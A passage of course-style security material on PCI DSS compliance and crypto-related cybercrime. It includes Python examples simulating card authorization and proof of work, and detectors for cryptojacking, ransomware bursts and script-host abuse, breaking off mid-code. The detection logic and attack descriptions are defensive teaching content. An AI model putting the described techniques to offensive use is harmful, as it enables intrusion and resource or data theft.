• Working towards PCI compliance also prepares you for other regulations, such as HIPAA and SOX.
• PCI compliance contributes to the corporate security strategy (even if only as a starting point).
• PCI compliance often improves IT infrastructure efficiency.
Failing to comply, on the other hand, can lead to:
• Compromised data that harms consumers, merchants and financial institutions.
• Severe damage to your reputation and your ability to conduct business, not just today but into the future.
• Account data breaches that cause catastrophic loss of sales, relationships and community standing; public companies often see a depressed share price after an account data breach.
• Lawsuits, insurance claims, cancelled accounts, payment card issuer fines and government fines.
• PCI compliance, like other regulatory requirements, can be hard for organizations that are not prepared to protect critical information. Protecting data is far more manageable with the right software and services: choose data loss prevention (DLP) software that accurately classifies cardholder data and enforces how it may be used.
• The Payment Card Industry Data Security Standard (PCI DSS) aims to improve security for consumers by setting requirements for any company that accepts, stores, processes or transmits payment card data, regardless of the number or size of its transactions. As a result, thousands of organizations across practically every industry must comply with it.
• Maintaining compliance is a top priority.
1. Watch for Card Skimmers
• POS data is stolen in two ways: by compromising the POS system itself, typically with stolen credentials, or by physically installing "card skimmers", usually on self-checkout terminals that are not monitored. These devices take only seconds to install and read payment card data and PIN entries directly from the card's magnetic stripe. EMV chip cards greatly reduce the value of skimmed data, because the chip cannot be cloned from the stripe, but at the time of the source report 42% of retailers had yet to update their payment terminals to accept chip cards, and some retailers with EMV-enabled terminals still could not accept them because the POS software did not yet support them. Such terminals must not be left completely unattended: every store should have on-site personnel trained to spot skimmers and assigned to check self-checkout terminals for them.
2. Install Updates as Soon as They Are Released
• Because cyber security is a constant "Spy vs. Spy" battle, in which defenders patch vulnerabilities while attackers find new ways in, POS software vendors release frequent updates to address the latest threats. For maximum protection these updates must be installed as soon as they are released, not on a monthly or quarterly schedule. The same applies to the operating system: retailers and restaurants running Microsoft Windows should install patches as soon as they are available.
3. Always Change Default Manufacturer’s Passwords
• Retailers and restaurants should always change the default password provided by the manufacturer as soon as a new piece of hardware is hooked up to their POS system.
• Default passwords are publicly available, and thus widely known to hackers; in fact, the first thing an attacker will attempt to do is access the device using the default password.
• Changing default passwords is required as part of an organization’s compliance with PCI-DSS standards. Likewise, software system passwords should also be changed upon installation, and then on a regular basis afterwards.
4. Keep the POS Network Separate
• Many retailers, restaurants and hotels offer free Wi-Fi to customers. The POS system must never be connected to that network, because an attacker on it could reach the POS. Likewise, if the POS system is not separated from the corporate network, an attacker who compromises the corporate network can move on to the POS. Two approaches are available: segment the two networks (separate VLANs or subnets with a firewall that permits only the traffic the POS actually needs), or, where full segmentation is impractical, require multi-factor authentication on every path between the corporate network and the POS system. The right choice depends on the organization's size and resources, so it is best to consult a managed security services provider (MSSP) about which solution fits.
5. Buy POS Systems Only from Reputable Dealers
• Retailers and restaurants run on extremely thin margins, and the individually franchised restaurants common in fast food operate on particularly tight budgets. As the industry automates, small operators may be tempted to seek the best "deal" on self-checkout systems, but a POS system bought from a supplier who turns out to be fraudulent is no deal at all and could mean financial ruin for that location. POS systems should be purchased only from known, reputable dealers, and if a deal seems too good to be true, it probably is.
6. Your number one priority is protecting your cardholder data (CHD). PCI has a very comprehensive set of rules to accomplish protection, but your company can keep the following best practices in mind when striving for PCI compliance.
• Segment your data. Keep CHD separate from ordinary company data by creating a cardholder data environment (CDE) that handles only CHD. This both protects the data and reduces the scope of your PCI audit.
• Encrypt your data. All CHD should be encrypted or tokenized from the moment you first handle a customer's card number, and it must also be encrypted at rest.
• Control access to your data. Role-based access control (RBAC) makes PCI compliance much easier: it ensures, for example, that the HR department has no access to CHD while system administrators have exactly the access they need.
• Monitor your data. Set up alerts for security incidents involving CHD or anything that could compromise the CDE. Attackers rarely come through the front door; they work methodically and quietly so as not to alert you. Monitor even the assets you consider trivial if they support the CDE.
7. PCI DSS considers any person, system or piece of technology that touches cardholder data (CHD) to be in scope.
• For example, if your organization operates a contact center that regularly takes customer payments over the phone, you can take the IT network, the agents and customer service representatives, the call recording systems and the rest of the telephony out of scope by using dual-tone multi-frequency (DTMF) masking technology.
• With DTMF masking, customers key their card data directly into their phone's keypad; the DTMF tones are replaced with flat tones before they reach the agent or the recording, so they cannot be decoded.
• Because the CHD is sent straight to the payment processor, such solutions keep the data out of the contact center environment entirely.
• As a result, far fewer controls are required for PCI DSS compliance, and the sensitive data is out of reach of fraudsters and hackers.
1. Assign ownership of the compliance process, generally to a security expert with relevant experience in coordinating security activities.
2. Build your architecture with PCI DSS requirements in mind from the start.
3. Conduct an in-depth risk assessment to define your security needs.
4. Put monitoring in place, with custom and automated controls and alerting.
5. Detect and respond quickly to failures of security controls.
6. Develop performance metrics to measure success and failure.
7. Be ready to prepare a substantial body of documentation for PCI DSS certification from scratch, and to maintain continuous compliance afterwards.
8. The list of documentation about your company and services includes:
• Antivirus Policy
• Cardholder Data Policy
• Firewall and Router Policy
• Information Security Policy
• Password Policy
• Physical Security Policy
• System Configuration Policy
• System Monitoring and Logging Policy
• Testing Systems and Processes Procedure
• Information Security Incident Management Policy
• Inventory and Ownership of Assets Policy
• Application and System DevelopmentSoftware Policy
• ManagingService Providers Policy
• Access Control Policy
• InformationSecurity Awareness Program
• InformationSecurity Responsibilities Policy Statement
• IndividualUser Agreement Template
• Data ClassificationPolicy
• Data Protection Policy
• Data Management Policy
9. You need to comply with PCI-DSS standards on a daily basis, even after the successful audit.
10. Consider appointing a permanent security lead (for example a CISSP-certified professional) to oversee all security activities.
• Cardholder: the individual who initiates a transaction by presenting a credit card issued in their name. The cardholder receives the goods from the merchant, and the issuing bank pays for them; the cardholder has agreed with the bank to repay the issuer later when they settle their monthly credit card bill.
• Merchant: the store or e-commerce shop with which the cardholder initiates the purchase. The merchant accepts credit cards to facilitate payment and may also accept other methods, including cash, debit and contactless payments.
• Acquirer (acquiring bank): the merchant's bank, which sends the transaction and authorization details on to the card network for approval and then relays the issuing bank's response back to the merchant. These functions may be performed in-house or by a third-party payment processor or merchant services provider.
• Payment processor: for many merchants the acquirer is also the payment processor; in other cases they are separate entities. The processor handles communication between the acquiring bank and the merchant, sending and receiving transaction details and authorizations and passing them to the merchant or the bank respectively.
• Card network: the card associations operate branded networks that carry transactions worldwide for a given card. They set the rules all banks and merchants must follow to use those networks and govern interchange fees. The most widely used networks in the US are Visa, Mastercard, American Express and Discover. The network accepts authorization requests from the merchant's acquiring bank and forwards them to the cardholder's issuing bank for approval.
• Issuer (issuing bank): the cardholder's bank or card-issuing payment account provider. The issuer receives the authorization request via the acquiring bank, the card network or the third-party processor and returns an approval or decline along the same path to the acquiring bank.
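The authorization path above, as an added Python example that is not part of the original course material: a merchant sends a request to its acquirer, the network routes it to the issuer by BIN prefix, and the response travels back along the same hops. The issuer's decision rules, the BIN-to-issuer routing table, the account balances and the auth-code format are all constructed for this example; the one security point it makes concrete is that the merchant keeps only a truncated PAN and the authorization code, never the full card number.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class AuthRequest:
    pan: str
    expiry: str          # "MM/YY" as printed on the card
    amount: float
    merchant_id: str


@dataclass
class AuthResponse:
    approved: bool
    reason: str
    auth_code: Optional[str]


def _expired(expiry: str, today: str) -> bool:
    """Compare MM/YY strings by (year, month); a card stays valid through its expiry month."""
    mm, yy = expiry.split("/")
    tm, ty = today.split("/")
    return (int(yy), int(mm)) < (int(ty), int(tm))


class Issuer:
    """Cardholder's bank: owns the account and makes the approve/decline decision."""

    def __init__(self, name: str, accounts: Dict[str, dict], today: str = "03/24"):
        self.name, self.accounts, self.today = name, accounts, today
        self._seq = 0

    def authorize(self, req: AuthRequest) -> AuthResponse:
        acct = self.accounts.get(req.pan)
        if acct is None:
            return AuthResponse(False, "no such account", None)
        if _expired(acct["expiry"], self.today):
            return AuthResponse(False, "card expired", None)
        if acct["balance"] < req.amount:
            return AuthResponse(False, "insufficient funds", None)
        acct["balance"] -= req.amount            # simplified: hold and settle in one step
        self._seq += 1
        return AuthResponse(True, "approved", f"{self.name}-{self._seq:06d}")


class CardNetwork:
    """Routes each request to the issuer that owns the PAN's BIN prefix and relays the answer."""

    def __init__(self, routes: Dict[str, Issuer]):
        self.routes = routes                     # {bin_prefix: issuer}, constructed for the demo

    def route(self, req: AuthRequest, trace: List[str]) -> AuthResponse:
        for prefix, issuer in self.routes.items():
            if req.pan.startswith(prefix):
                trace.append(f"network -> issuer({issuer.name})")
                resp = issuer.authorize(req)
                trace.append(f"issuer({issuer.name}) -> network: {resp.reason}")
                return resp
        return AuthResponse(False, "unroutable BIN", None)


class Acquirer:
    """Merchant's bank (here also acting as its processor): forwards to the network and back."""

    def __init__(self, network: CardNetwork):
        self.network = network

    def authorize(self, req: AuthRequest, trace: List[str]) -> AuthResponse:
        trace.append("acquirer -> network")
        resp = self.network.route(req, trace)
        trace.append("network -> acquirer")
        return resp


class Merchant:
    """Point of sale: passes the PAN onward but retains only a truncated PAN and the auth code."""

    def __init__(self, merchant_id: str, acquirer: Acquirer):
        self.merchant_id, self.acquirer = merchant_id, acquirer
        self.receipts: List[dict] = []

    def sale(self, pan: str, expiry: str, amount: float):
        trace = ["merchant -> acquirer"]
        resp = self.acquirer.authorize(AuthRequest(pan, expiry, amount, self.merchant_id), trace)
        trace.append("acquirer -> merchant")
        self.receipts.append({"pan": "*" * (len(pan) - 4) + pan[-4:], "amount": amount,
                              "approved": resp.approved, "auth_code": resp.auth_code})
        return resp, trace


def build_demo() -> Merchant:
    """Two issuers keyed by BIN prefix; PANs (public test numbers), balances and expiries are constructed."""
    bank_a = Issuer("bank-a", {"4111111111111111": {"balance": 100.0, "expiry": "12/29"}})
    bank_b = Issuer("bank-b", {"5500000000000004": {"balance": 10.0, "expiry": "01/23"}})
    return Merchant("shop-001", Acquirer(CardNetwork({"4": bank_a, "5": bank_b})))


if __name__ == "__main__":
    shop = build_demo()
    for pan, exp, amt in [("4111111111111111", "12/29", 42.10),
                          ("5500000000000004", "01/23", 5.00),
                          ("4111111111111111", "12/29", 80.00)]:
        resp, trace = shop.sale(pan, exp, amt)
        print(" / ".join(trace), "=>", resp)
    print(shop.receipts)   # no full PAN is retained at the merchant
```

In a real deployment the PAN would be encrypted or tokenized before it leaves the terminal, so the merchant's own systems would never see it at all; the trace list is the part worth keeping in mind when reasoning about which parties are in PCI scope.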
4.1: Evaluate emerging trends and threats from crypto-currency related attacks by cyber criminals.
• The first half of 2019 demonstrated that no environment is immune to cyber attacks.
• Threat actors developed new tool sets and techniques, targeting corporate assets stored on cloud infrastructure, individuals' mobile devices, trusted third-party suppliers' applications and even popular mail platforms.
• One of the dominant trends of 2019 was targeted ransomware. Collaboration between threat actors enabled even more destructive attacks that paralysed numerous organizations worldwide.
• What ends in a ransomware attack usually starts with a quieter sequence of bot infections. Crypto miners, while still highly visible, declined that year: only 21% of organizations worldwide were affected by crypto-mining attacks, compared with 42% at the peak in 2018. This followed the shutdown of the Coinhive drive-by mining service.
• Software supply chain attacks attracted public and government attention. In such attacks threat actors inject malicious code into components of legitimate applications, victimizing large numbers of unsuspecting users.
• The accumulation of several cases since the beginning of the year led the U.S. government to devote special attention to this evolving threat, with official recommendations on minimizing the impact of such attacks expected to follow.
• To give organizations the best level of protection, security experts must stay attuned to the ever-changing landscape and the latest threats and attack methods.
• Drawing on data from Check Point's ThreatCloud World Cyber Threat Map between January and June 2019, combined with primary research by the company's cyber security experts, the report gives a comprehensive overview of the trends observed in crypto miners, ransomware, botnets, banking Trojans, data breaches and mobile threats.
• Cyber security is the process of protecting systems, devices, networks, and data from any type of unauthorized access or attack.
• Cyber- attacks typically try to gain access to sensitive information and alter, disrupt, destroy, or control that information for malicious or criminal intent.
• These attacks are of increasing concern to businesses and individuals. As more information and data continues to move online, everything from emails and credit cards to navigation systems and medical records are susceptible to digital attacks.
• Cryptocurrency is a decentralized digital currency. Its ledger is stored using blockchain technology and it is not regulated by any bank, government or financial institution.
• Decentralization is one of the main features that sets cryptocurrency (often shortened to "crypto") apart from other currencies. Anyone can create and issue one, so countless different coins exist.
• The two most popular and widely recognized are Bitcoin and Ethereum, recorded on the Bitcoin and Ethereum blockchains respectively.
• Crypto can, in theory, be used like any other currency to purchase goods and services.
• In recent years, however, many have come to treat new cryptocurrencies like speculative stocks. Crypto traders buy and hold large quantities of a coin, betting that its value will rise.
• If it does, they can sell at a profit. More often than not, though, such speculation ends in disaster, because coins can lose their value in a matter of minutes.
• Pump-and-dump scams and rug pulls are a constant threat to crypto investors, but they are not the only risks in this space. Even if the coin you hold keeps or gains value, you can still lose your money to a crypto hack.
A crypto hack involves attackers accessing and stealing your coins without authorization. Some of the most common targets and techniques:
Bridge attacks
• Bridge attacks target your crypto while it is being transferred from one blockchain to another.
• Each coin exists on a blockchain (a decentralized database, usually called a ledger). Protocols that move value from one chain to another (for example, to turn Bitcoin into Ethereum) are called cross-chain bridges. Bridges are essential for blockchain interoperability, but they are also attractive targets.
• Attackers have used many methods against bridges, from exploiting bugs in a bridge's code to using leaked signing keys. Some have even tricked bridge systems with bogus deposits, converting them into real and valuable assets on the other chain.
Wallet attacks
• Wallets are applications that let you access, manage and move your cryptocurrency. They run on a device such as a smartphone or computer and are either hot (connected to the internet) or cold (offline). If you keep a hot wallet on a device, an attacker who compromises that device can get into the wallet and drain it.
Exchange attacks
• Many users keep their coins on exchanges: online platforms where you can buy, sell and store crypto, sometimes earning interest on it. Exchanges hold huge amounts of cryptocurrency on behalf of their users, so attackers target them constantly with exploits, phishing emails and social engineering. If an exchange is breached, coins held in its hot wallets can be stolen.
Crypto hackers use many different tactics to steal coins:
Phishing emails
• Attackers send emails that trick people into downloading malware or giving up sensitive information. The email usually links to a page that installs malware on the victim's device, which the attacker can then use to take control of it or to monitor its activity. If the victim has a hot wallet on that device, it is only a matter of time before the funds are stolen.
Exploits
• The software that stores and transfers cryptocurrency is a frequent target. Whether it is a cross-chain bridge or an exchange, any piece of crypto infrastructure can contain bugs and unpatched vulnerabilities, and attackers who find them use them in bridge attacks and exchange heists.
Leaked keys
• The simplest way to steal crypto is to use the private keys that control the funds on the blockchain. Anyone holding a wallet's keys can move its coins, so if the keys leak (for example, because they were stored unencrypted on a device that was later compromised) an attacker can open the wallet and move everything in it to their own wallet.
• Cryptocurrency is, in its most basic form, peer-to-peer electronic cash: it lets internet payments go directly from one party to another without passing through a financial institution.
• Cryptographic proof of work is used to timestamp transactions on the network and to make the recorded history expensive to rewrite.
• "Cryptocurrency" is a subset of the broader term "digital currency". Digital currencies that can be exchanged for virtual and physical items in a closed system, and for fiat currency in an open system, include airline miles, tokens for video games and online casinos, the Brixton Pound (usable only in the Brixton community in Greater London), and several others.
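The proof-of-work timestamping described above, as an added Python example that is not part of the original course material: each block commits to the previous block's hash, a nonce is searched until the SHA-256 of the block falls below a target, and a verifier recomputes every hash. The difficulty, the transaction strings and the timestamps are constructed for the example, and the toy difficulty is far below any real network's. Two helpers show why the work matters: editing a block without redoing the work breaks verification, and making the edit stick means re-mining that block and every block after it.

```python
import copy
import hashlib
import json

DIFFICULTY_BITS = 14   # assumption: toy difficulty, about 16k hash attempts per block on average
GENESIS_PREV = "0" * 64


def block_hash(prev_hash: str, transactions: list, timestamp: int, nonce: int) -> str:
    """SHA-256 over a canonical JSON encoding of the block's contents."""
    payload = json.dumps({"prev": prev_hash, "tx": transactions, "ts": timestamp, "nonce": nonce},
                         sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(payload.encode()).hexdigest()


def meets_target(h: str, bits: int = DIFFICULTY_BITS) -> bool:
    """Proof of work: the hash, read as a 256-bit integer, must start with `bits` zero bits."""
    return int(h, 16) >> (256 - bits) == 0


def mine_block(prev_hash: str, transactions: list, timestamp: int, bits: int = DIFFICULTY_BITS) -> dict:
    """Search nonces until the block hash meets the target; the spent work is what timestamps the block."""
    nonce = 0
    while True:
        h = block_hash(prev_hash, transactions, timestamp, nonce)
        if meets_target(h, bits):
            return {"prev": prev_hash, "tx": transactions, "ts": timestamp, "nonce": nonce, "hash": h}
        nonce += 1


def verify_chain(chain: list, bits: int = DIFFICULTY_BITS) -> bool:
    """Recompute every hash, check the target, and check each block points at its predecessor."""
    prev = GENESIS_PREV
    for block in chain:
        h = block_hash(block["prev"], block["tx"], block["ts"], block["nonce"])
        if block["prev"] != prev or h != block["hash"] or not meets_target(h, bits):
            return False
        prev = h
    return True


def build_demo_chain() -> list:
    """Three blocks of constructed transactions with fixed timestamps 600 s apart."""
    chain, prev = [], GENESIS_PREV
    for i, tx in enumerate([["alice->bob:5"], ["bob->carol:2"], ["carol->dave:1"]]):
        block = mine_block(prev, tx, 1_700_000_000 + 600 * i)
        chain.append(block)
        prev = block["hash"]
    return chain


def tampered_copy(chain: list, index: int, new_tx: list) -> list:
    """Rewrite one block's transactions without redoing the work (what a lazy attacker would try)."""
    bad = copy.deepcopy(chain)
    bad[index]["tx"] = new_tx
    return bad


def rewrite_from(chain: list, index: int, new_tx: list, bits: int = DIFFICULTY_BITS) -> list:
    """Rewrite block `index` and re-mine it and every later block: the real cost of undoing history."""
    new_chain = copy.deepcopy(chain[:index])
    prev = new_chain[-1]["hash"] if new_chain else GENESIS_PREV
    for j in range(index, len(chain)):
        tx = new_tx if j == index else chain[j]["tx"]
        block = mine_block(prev, tx, chain[j]["ts"], bits)
        new_chain.append(block)
        prev = block["hash"]
    return new_chain


if __name__ == "__main__":
    chain = build_demo_chain()
    for b in chain:
        print(b["ts"], b["nonce"], b["hash"][:16], b["tx"])
    print("valid:", verify_chain(chain))
    print("tampered valid:", verify_chain(tampered_copy(chain, 1, ["bob->mallory:2"])))
    print("re-mined valid:", verify_chain(rewrite_from(chain, 1, ["bob->mallory:2"])))
```

On a real network the attacker re-mining from block 1 is racing every honest miner extending the longest chain, which is why the amount of accumulated work, not the block count, is what makes old transactions practically irreversible.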
The general requirements for a successful distributed cryptocurrency are:
1. Open-source software: a core, trustworthy group of developers must validate the code and future revisions of the network implementation.
2. Decentralized: even if it is not fully distributed, it must not be dominated by a single group of people or organization.
3. Peer-to-peer: the goal is to avoid intermediaries, although pools of sub-networks can form.
4. Global: whether or not the parties use smart contracts, the currency is worldwide, which matters for financial inclusion.
5. Fast: transactions complete faster, and confirmation times can be cut in half.
• Reliable: transactions are non-repudiable and require no arbitration, so a large settlement team could save a great deal on financial transactions.
• Secure: the privacy architecture can be improved by combining proof of identity with encryption, which would also address Know Your Customer (KYC) and anti-money-laundering and counter-terrorist-financing (AML/CTF) obligations.
• Advanced and adaptable: a vast range of assets, financial instruments and markets can be accommodated by the system.
• Automated: algorithms can automate payments and contracts swiftly.
• Scalable: the system must serve millions of individuals.
• Integration platform: it can be designed to combine digital finance and digital law in a smart contract and financial transaction environment; customized agreements between multiple parties may use user-defined scripting clauses, hooks and variables.
There are four major categories of cyber crime that lean heavily on, or fully require, cryptocurrencies such as Bitcoin, Ethereum and Monero: ransomware, DDoS extortion, cryptojacking and crypto theft.
• Ransomware is usually paid in cryptocurrency. The attack encrypts the victim's files with malware, and the perpetrators promise to unlock them when the ransom is paid. Paying in crypto lets criminals keep their anonymity and makes the payments harder to trace. (In the increasingly common "double extortion" variant, the attackers also threaten to publish the files if the victim does not pay.)
• DDoS extortion is similar to ransomware. Instead of gaining access and encrypting files, the attackers launch a sustained DDoS attack until a ransom in crypto is paid.
• Another major crime is illegal cryptocurrency mining, called cryptojacking. Attackers gain access to computing power owned by others, usually through purpose-built malware, and use it to mine crypto for themselves.
• Unlike most computer-related crimes, cryptojackers do not steal money or data directly or demand a ransom. They steal computing resources, which shows up as higher energy costs, lower performance for users and faster battery degradation.
• Cryptojacking actually rose in 2022. An Atlas VPN analysis found that instances of cryptojacking grew 3.8 times in the third quarter of 2022 (interestingly, the number of victims declined).
• Analysts assume that cryptojackers are anticipating growth in crypto once it bottoms out and are mining aggressively in the hope of profiting.
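Because cryptojacking steals CPU time rather than data, it is usually spotted from network telemetry rather than from a DLP alert. The following Python script, an added example that is not part of the original course material, runs simple detection logic over constructed web-proxy log lines: it flags clients that talk the Stratum mining protocol, connect to ports commonly used by mining pools, contact hostnames with pool-like names, or keep reconnecting to the same endpoint. The log format, the port list, the hostname keywords and the thresholds are this example's assumptions, not a vendor signature set.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Indicators used by this example (illustrative assumptions): the Stratum mining protocol's
# URL scheme, TCP ports commonly used by mining pools, hostname keywords typical of pools,
# and repeated connections from one client to the same endpoint.
POOL_PORTS = {3333, 4444, 5555, 14444}
POOL_HOST_RE = re.compile(r"pool|xmr|monero", re.IGNORECASE)
REPEAT_THRESHOLD = 3

# Constructed proxy log format: timestamp, client IP, method, URL, byte count.
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) bytes=(\d+)$")


def parse_line(line: str):
    """Parse one proxy log line into a record, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, method, url, nbytes = m.groups()
    parts = urlsplit(url)
    return {"ts": ts, "src": src, "method": method, "scheme": parts.scheme.lower(),
            "host": (parts.hostname or "").lower(), "port": parts.port, "bytes": int(nbytes)}


def line_indicators(rec: dict) -> set:
    """Per-connection indicators; any one alone is weak, several together are a strong signal."""
    found = set()
    if rec["scheme"].startswith("stratum"):
        found.add("stratum_scheme")
    if rec["port"] in POOL_PORTS:
        found.add("pool_port")
    if POOL_HOST_RE.search(rec["host"]):
        found.add("pool_hostname")
    return found


def detect(log_text: str) -> dict:
    """Map each client IP that shows mining indicators to the sorted list of indicators seen."""
    per_src = defaultdict(set)
    endpoint_counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        found = line_indicators(rec)
        key = (rec["src"], rec["host"], rec["port"])
        endpoint_counts[key] += 1
        if found and endpoint_counts[key] >= REPEAT_THRESHOLD:
            found.add("repeated_connections")
        if found:
            per_src[rec["src"]].update(found)
    return {src: sorted(inds) for src, inds in per_src.items()}


def severity(indicators: list) -> str:
    """Triage rule for this example: three or more indicators is high, two medium, one low."""
    return "high" if len(indicators) >= 3 else "medium" if len(indicators) == 2 else "low"


# Constructed sample log: one host mining overnight via Stratum, one clean host, one
# host making a single connection to a pool-looking endpoint on a pool port.
SAMPLE_PROXY_LOG = """\
2024-03-01T02:00:01 10.0.5.23 CONNECT stratum+tcp://xmr.pool-example.net:4444 bytes=18234
2024-03-01T02:05:01 10.0.5.23 CONNECT stratum+tcp://xmr.pool-example.net:4444 bytes=17990
2024-03-01T02:10:01 10.0.5.23 CONNECT stratum+tcp://xmr.pool-example.net:4444 bytes=18102
2024-03-01T09:12:44 10.0.5.40 GET https://www.example.com/ bytes=5120
2024-03-01T09:13:02 10.0.5.40 GET https://updates.example.org/patch.bin bytes=9800000
2024-03-01T11:30:00 10.0.5.51 CONNECT tcp://pool.example-mine.org:3333 bytes=2048
"""

if __name__ == "__main__":
    for src, inds in detect(SAMPLE_PROXY_LOG).items():
        print(f"{src}: {severity(inds)} ({', '.join(inds)})")
```

Hostname keywords and port numbers are cheap for an attacker to change, so in practice the Stratum handshake itself and the sustained, regular connection pattern (often paired with unexplained CPU load on the endpoint) are the indicators worth building alerts on.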
• Finally, crypto theft is the hacking of exchanges and other platforms to steal coins directly from their rightful owners. This kind of attack declined as exchanges themselves went out of business during the crash in cryptocurrency values.
• Cyber criminals use dark web exchanges because they do not check user identities.
• These exchanges typically do not store currency but merely convert crypto from one service to another, often at inflated fees.
• They operate in many ways like legitimate businesses. They spend heavily on advertising, for example, partly to build trust among malicious actors who themselves do not want to be ripped off.
• Crashing cryptocurrency prices are squeezing dark web exchanges. This reduces incentives for threat actors because it cuts their income, makes buying vulnerabilities more expensive and shrinks the revenue needed to fund Malware-as-a-Service operations.
• In other words, falling crypto prices kneecapped the purchasing power of groups using crypto for illegal activities.
• During the rapid declines of early 2022, exchanges tried to convert their crypto into fiat currencies such as the U.S. dollar (a government-issued currency not backed by a physical commodity such as gold or silver), but the value after conversion was not enough to sustain the business.
• Advertising for dark web exchanges nearly stopped in spring 2022. Many went bankrupt or shut down.
• The drop in cryptocurrency values radically slowed financial crime, including illegal dark web transactions. Losses for the first half of 2022 were well down, according to blockchain analytics company Chainalysis; scammer income dropped by about two-thirds (65%) over the first seven months of the year.
• It’s easy to conclude that the drop in the value of crypto currencies directly caused the decline in scam revenue. But that would be a mistake.
• This drop wasn’t due entirely to the drop in crypto currency, according to the report. Both potential victims and police chalked up notable successes in countering such scams. In other words, the general defense against some of these crimes has improved, and credit there is due.
• Another point to consider is that total annual scam revenue is usually determined by a very small number of very large scams. One massive scam could upend these numbers and reverse the trend.
• In addition, the crash caused crypto currency transaction volumes — both legitimate and illegal — to fall. So it reduced “good” transactions in equal measure as “bad” ones.
• Also, ransomware gangs likely don’t care if the value of crypto currencies is low. They demand ransoms typically in U.S. dollar amounts in the form of whatever quantity of crypto currencies are equivalent at the time of demand.
• While there may be a disincentive to strike while crypto is rapidly declining, once it hits bottom, that disincentive is removed. Volatility in one direction (down) disincentivizes ransomware temporarily. Unfortunately, ransomware is here to stay.
• Most importantly, however, it would also be a mistake to assume that crypto currency valuations will stay low, or that reductions in crimes that rely on crypto currencies will stay low. The consensus among experts is that such crimes will come roaring back to life.
• Ransomware began as malware focused on extorting payments via data encryption. By denying legitimate users access to their data by encrypting it, the attackers could demand a ransom for its recovery.
• However, the growth of ransomware threats has resulted in focused security research designed to identify and remediate these threats. The process of encrypting every file on a target system is time-consuming — making it possible to save some data by terminating the malware before data is encrypted — and companies have the potential to restore from backups without paying the ransom.
• Double extortion attacks added data theft to data encryption, and some ransomware operators have shifted to focus solely on the extortion effort, skipping encryption entirely. These ransomware data breaches are faster to carry out, harder to detect, and cannot be fixed using backups, making them a more effective approach for cybercriminals and a greater threat to businesses.
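As an added example (not from the course material), a minimal detector for the early-termination idea above: it flags a process that writes several high-entropy files within a short window, using a Shannon-entropy helper over constructed file-write events. The event layout, pids, paths and thresholds are my own assumptions.

```python
import math
from collections import defaultdict

def shannon_entropy(data: bytes) -> float:
    """Bits per byte (0..8); ciphertext and compressed data sit close to 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

# Constructed file-write events: (seconds, pid, path, bytes written).
# A real deployment would take these from an EDR or file-system audit feed.
SAMPLE_EVENTS = [
    (0.0, 101, "/home/alice/report.docx", b"Quarterly figures, plain prose. " * 8),
    (1.0, 202, "/srv/share/a.xlsx.locked", bytes(range(256)) * 2),
    (1.4, 202, "/srv/share/b.pdf.locked", bytes(range(255, -1, -1)) * 2),
    (2.1, 202, "/srv/share/c.docx.locked", bytes(range(256)) * 3),
    (3.0, 303, "/home/bob/backup.zip", bytes(range(256))),  # one archive write: benign
    (9.0, 202, "/srv/share/d.txt.locked", bytes(range(256))),
]

def detect_ransomware_burst(events, window=5.0, min_files=3, min_entropy=7.0):
    """Return the set of pids that wrote >= min_files distinct high-entropy
    files within any `window`-second span. Bulk encryption is slow, so an
    alert at the third file leaves most of the share untouched."""
    high = defaultdict(list)
    for t, pid, path, data in events:
        if shannon_entropy(data) >= min_entropy:
            high[pid].append((t, path))
    flagged = set()
    for pid, writes in high.items():
        writes.sort()
        for start, _ in writes:
            paths = {p for t, p in writes if start <= t <= start + window}
            if len(paths) >= min_files:
                flagged.add(pid)
                break
    return flagged

if __name__ == "__main__":
    # The caller would suspend these pids and snapshot the share before deciding.
    print("suspend candidates:", detect_ransomware_burst(SAMPLE_EVENTS))  # {202}
```

The single high-entropy archive written by pid 303 is not flagged, which is the false-positive case a per-file entropy check alone would miss.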
• Companies are increasingly adopting cloud computing, a move with significant security implications. Unfamiliarity with cloud security best practices, the cloud shared security model, and other factors can make cloud environments more vulnerable to attack than on-prem infrastructure.
• While cybercriminals are increasingly targeting cloud infrastructure with exploits for new vulnerabilities, an emerging and worrying tactic is the targeting of cloud service providers. By targeting cloud service providers and cloud solutions with their attacks, a cybercriminal can gain access to their customers’ sensitive data and potentially their IT infrastructure. By exploiting these trust relationships between organizations and their service providers, attackers can dramatically increase the scale and impact of their attacks.
• These attempts to infect users’ mobile devices have expanded from fake apps to cracked and custom versions of legitimate apps. Cybercriminals are offering unofficial versions of apps as malicious APKs via direct downloads and third-party app stores. These apps are designed to take advantage of name recognition to slip malware onto employee devices.
• While ransomware and data breaches are some of the most visible threats to corporate data security, wipers and other destructive malware can have even greater business impacts. Instead of breaching information or demanding a ransom for its return, wipers delete the data entirely.
• While wipers have been relatively rare in the past, they experienced a resurgence in 2022. Multiple families of wipers have been developed and deployed against Ukraine as part of its conflict with Russia. Other countries, including Iran and Albania, have also been targeted by destructive cyber attacks, indicating the growing popularity of wipers as a tool for hacktivism and cyber warfare.
• The line between legitimate penetration testing and system administration tools and malware can be a fine one. Often, functionality that cyber threat actors would build into their malware is also built into their targets’ operating systems or available via legitimate tools that are unlikely to be recognized as malware by signature-based detection tools.
• Cyber threat actors have been increasingly taking advantage of this to “live off the land” in their attacks. By leveraging built-in features and legitimate tools, they decrease their probability of detection and improve the likelihood of a successful attack. Also, the use of existing solutions can help to scale attack campaigns and allow cybercriminals to use the state of the art in hacking tools.
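An added detection example (not from the course): a few telemetry rules of the kind used to catch living-off-the-land activity, run over constructed process-creation events. Because the binaries are legitimate, the rules look at the parent process and command-line context rather than the file itself; the event layout, host names and rule thresholds are assumptions.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str   # image name of the parent process
    image: str    # image name of the new process
    cmdline: str

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}

# Each rule is (name, predicate). The context, not the binary, is what is suspicious:
# the same binaries launched from explorer.exe by an administrator are left alone.
RULES = [
    ("office_spawns_script_host",
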